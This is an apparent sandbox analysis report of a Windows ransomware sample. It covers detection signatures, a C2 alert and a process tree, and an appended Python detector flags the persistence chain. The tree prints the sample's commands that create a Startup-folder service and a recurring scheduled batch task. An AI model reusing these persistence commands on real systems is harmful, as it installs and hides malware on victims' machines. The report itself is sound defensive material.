Windows Analysis Report
BiXS3FRoLe.exe

Overview

General Information

Sample name: BiXS3FRoLe.exe (renamed because the original name is a hash value)
Original sample name: 1e89b482a11bdda467322cca6a8a06621fc834587bfeb682cda22ee93885fe84.exe
Analysis ID: 1569984
MD5: 8f807535948b5e93317baf48a4d0e69d
SHA1: 9c3a19d95ebd7d43cc37437237fbc75ebd541bf0
SHA256: 1e89b482a11bdda467322cca6a8a06621fc834587bfeb682cda22ee93885fe84
Tags: exe, user-JAMESWT_MHT

Detection

TrojanRansom
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected TrojanRansom
AI detected suspicious sample
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to clear event logs
Deletes shadow drive data (may be related to ransomware)
Drops PE files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Sigma detected: Suspicious New Service Creation
Sigma detected: WScript or CScript Dropper
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • BiXS3FRoLe.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\BiXS3FRoLe.exe" MD5: 8F807535948B5E93317BAF48A4D0E69D)
    • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7456 cmdline: C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • tasklist.exe (PID: 7472 cmdline: tasklist /v /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7480 cmdline: findstr /i "dcdcf" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 7884 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 7916 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 7932 cmdline: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • sc.exe (PID: 7964 cmdline: sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 7996 cmdline: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • wscript.exe (PID: 8036 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 8156 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 2524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 7260 cmdline: tasklist /v MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7316 cmdline: find /I /c "dcdcf" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 7480 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 7356 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7216 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 2088 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 5632 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7472 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 7992 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 8096 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 7488 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • timeout.exe (PID: 7544 cmdline: timeout /t 15 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3096 cmdline: tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • find.exe (PID: 656 cmdline: find /I "BiXS3FRoLe.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 8072 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • schtasks.exe (PID: 8092 cmdline: schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 8116 cmdline: C:\Windows\system32\cmd.exe /c echo %date%-%time% MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • cmd.exe (PID: 8132 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 8148 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 8164 cmdline: find /i "os name" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 7252 cmdline: C:\Windows\system32\cmd.exe /c systeminfo|find /i "original" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • systeminfo.exe (PID: 6944 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • find.exe (PID: 1732 cmdline: find /i "original" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
    • cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • svchost.exe (PID: 7516 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Sgrmuserer.exe (PID: 7552 cmdline: C:\Windows\system32\Sgrmuserer.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7588 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7616 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7724 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 8180 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5768 cmdline: C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 1636 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 5900 cmdline: tasklist /v MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • find.exe (PID: 6032 cmdline: find /I /c "dcdcf" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • Xinfecter.exe (PID: 8172 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" MD5: 8F807535948B5E93317BAF48A4D0E69D)
    • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware Configuration

No configs have been found

Yara Overview

Source                                          Rule                      Description                 Author
Process Memory Space: BiXS3FRoLe.exe PID: 7364  JoeSecurity_TrojanRansom  Yara detected TrojanRansom  Joe Security
Process Memory Space: Xinfecter.exe PID: 8172   JoeSecurity_TrojanRansom  Yara detected TrojanRansom  Joe Security

      Sigma Overview

      System Summary

      Source: File created | Author: Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\Desktop\BiXS3FRoLe.exe, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\S-6748.bat
      Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7864, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 7884, ProcessName: sc.exe
      Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7996, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 8036, ProcessName: wscript.exe
      Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: EventID: 11, Image: C:\Users\user\Desktop\BiXS3FRoLe.exe, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
      Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7996, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" , ProcessId: 8036, ProcessName: wscript.exe
      Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7864, ParentProcessName: cmd.exe, ProcessCommandLine: sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto, ProcessId: 7884, ProcessName: sc.exe
      Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7516, ProcessName: svchost.exe
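The process tree and the Sigma matches above describe one persistence chain: the sample writes a copy of itself to the Startup folder as Xinfecter.exe, registers that path as an auto-start service named SqlBakup (attempted with both `start=auto` and `start= auto` and with two Startup folder paths), schedules S-2153.bat from AppData every six minutes under the task name Microsoft_Auto_Scheduler, and that batch file hands off to WScript running S-8459.vbs. The following is an added example, not Joe Sandbox output and not part of this report, that re-implements those checks in Python over constructed Sysmon-style events shaped like the tree. The event dictionaries, the rule names and the Program Files control case are this example's own assumptions; they are not the titles of the Sigma rules that matched.

```python
"""Added example (not Joe Sandbox output): the checks behind the Sigma matches
above, run over constructed Sysmon-style events that mirror the process tree.

A PE written to the Startup folder, 'sc create' with a binPath in that folder,
'schtasks /create' running a .bat from AppData, and WScript launching a .vbs
from AppData are each caught by one rule; a service under Program Files is not."""
import re

# Locations an unprivileged user can write to.  A service binary or scheduled
# task target living here is the signal: properly installed services live
# under Program Files or System32, not under a user profile.
USER_WRITABLE = re.compile(
    r"\\(?:Users|Documents and Settings)\\[^\\]+\\AppData\\"
    r"|\\Start Menu\\Programs\\Startup\\",
    re.IGNORECASE,
)
WSH_SCRIPT = re.compile(r'"([^"]+\.(?:vbs|vbe|js|jse|wsf))"', re.IGNORECASE)
SCRIPT_EXT = re.compile(r"\.(?:bat|cmd|vbs|js|wsf)$", re.IGNORECASE)


def sc_binpath(cmdline):
    """Value of binPath= in an 'sc create' line.  sc.exe wants a space after
    the '='; the tree shows both 'start=auto' and 'start= auto', so both
    spellings are accepted, quoted or not."""
    m = re.search(r'binPath=\s*(?:"([^"]*)"|(\S+))', cmdline, re.IGNORECASE)
    return (m.group(1) or m.group(2)) if m else None


def schtasks_target(cmdline):
    """Value of /tr; this sample wraps it in double quotes around single quotes."""
    m = re.search(r"/tr\s+\"?'?([^\"']+)'?\"?", cmdline, re.IGNORECASE)
    return m.group(1) if m else None


def evaluate(events):
    """Return (rule, evidence) pairs for matching events.  EventID 11 is a
    Sysmon FileCreate, EventID 1 a ProcessCreate."""
    hits = []
    for ev in events:
        if ev.get("EventID") == 11:
            target = ev.get("TargetFilename", "")
            if target.lower().endswith(".exe") and USER_WRITABLE.search(target):
                hits.append(("pe_dropped_to_user_writable_path", target))
            continue
        image = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "")
        if image.endswith("\\sc.exe") and re.search(r"\bcreate\b", cmd, re.I):
            path = sc_binpath(cmd)
            if path and USER_WRITABLE.search(path):
                hits.append(("service_binpath_in_user_writable_path", path))
        elif image.endswith("\\schtasks.exe") and "/create" in cmd.lower():
            path = schtasks_target(cmd)
            if path and (USER_WRITABLE.search(path) or SCRIPT_EXT.search(path)):
                hits.append(("scheduled_task_runs_user_script", path))
        elif image.endswith(("\\wscript.exe", "\\cscript.exe")):
            m = WSH_SCRIPT.search(cmd)
            if m and USER_WRITABLE.search(m.group(1)):
                hits.append(("wsh_script_from_user_writable_path", m.group(1)))
    return hits


# Constructed events in the shape of the report's process tree (not real logs).
STARTUP_EXE = (r"C:\Users\user\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup\Xinfecter.exe")
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\user\Desktop\BiXS3FRoLe.exe",
     "TargetFilename": STARTUP_EXE},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\sc.exe",
     "CommandLine": f'sc create SqlBakup binPath= "{STARTUP_EXE}" start= auto'},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": "schtasks /create /sc minute /mo 6 /tn \"Microsoft_Auto_Scheduler\" "
                    "/tr \"'C:\\Users\\user\\AppData\\S-2153.bat'\" /f"},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"'},
    # Control case (assumed benign): a service under Program Files must not fire.
    {"EventID": 1, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc create VendorAgent binPath= "C:\Program Files\Vendor\agent.exe" start= auto'},
]

if __name__ == "__main__":
    for rule, evidence in evaluate(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

Running the block prints four hits, one per stage of the chain, and nothing for the control service. The path test is deliberately on the target of the service or task rather than on the image that created it, because every stage here is launched through cmd.exe and sc.exe/schtasks.exe, which are legitimate binaries.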
      Suricata IDS Alerts

      Timestamp                        SID      Severity  Classtype                                      Source IP     Source Port  Destination IP  Destination Port  Protocol
      2024-12-06T13:42:11.708896+0100  2045821  1         Malware Command and Control Activity Detected  192.168.2.10  49715        185.147.34.53   3586              TCP


      AV Detection

      Source: BiXS3FRoLe.exe | Avira: detected
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Avira: detection malicious, Label: HEUR/AGEN.1353205
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | ReversingLabs: Detection: 84%
      Source: BiXS3FRoLe.exe | ReversingLabs: Detection: 84%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Joe Sandbox ML: detected
      Source: BiXS3FRoLe.exe | Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD4230 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,0_2_00AD4230
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD47F0 CryptReleaseContext,0_2_00AD47F0
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD4900 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,0_2_00AD4900
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD4390 CryptAcquireContextA,GetLastError,CryptReleaseContext,0_2_00AD4390
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD4720 CryptReleaseContext,0_2_00AD4720
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00AD4760 CryptGenRandom,__CxxThrowException@8,0_2_00AD4760
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00074230 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,CryptAcquireContextA,___std_exception_copy,48_2_00074230
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_000747F0 CryptReleaseContext,48_2_000747F0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00074900 CryptGenRandom,CryptReleaseContext,__CxxThrowException@8,48_2_00074900
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00074390 CryptAcquireContextA,GetLastError,CryptReleaseContext,48_2_00074390
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00074720 CryptReleaseContext,48_2_00074720
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00074760 CryptGenRandom,__CxxThrowException@8,48_2_00074760
      Source: BiXS3FRoLe.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: BiXS3FRoLe.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: z:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: x:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: v:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: t:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: r:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: p:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: n:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: l:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: j:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: h:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: f:
      Source: C:\Windows\System32\svchost.exe | File opened: d:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: b:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: y:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: w:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: u:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: s:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: q:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: o:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: m:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: k:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: i:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: g:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: e:
      Source: C:\Windows\System32\cmd.exe | File opened: c:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File opened: a:
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A84500 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,0_2_00A84500
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00024500 NetUserEnum,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,NetApiBufferFree,48_2_00024500
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A88240 SetErrorMode,FindFirstFileW,0_2_00A88240
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A88380 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,0_2_00A88380
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A89ABA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,0_2_00A89ABA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00A8AF50 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,0_2_00A8AF50
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | Code function: 0_2_00B3BA6B FindFirstFileExA,0_2_00B3BA6B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 48_2_00028240 SetErrorMode,FindFirstFileW,48_2_00028240
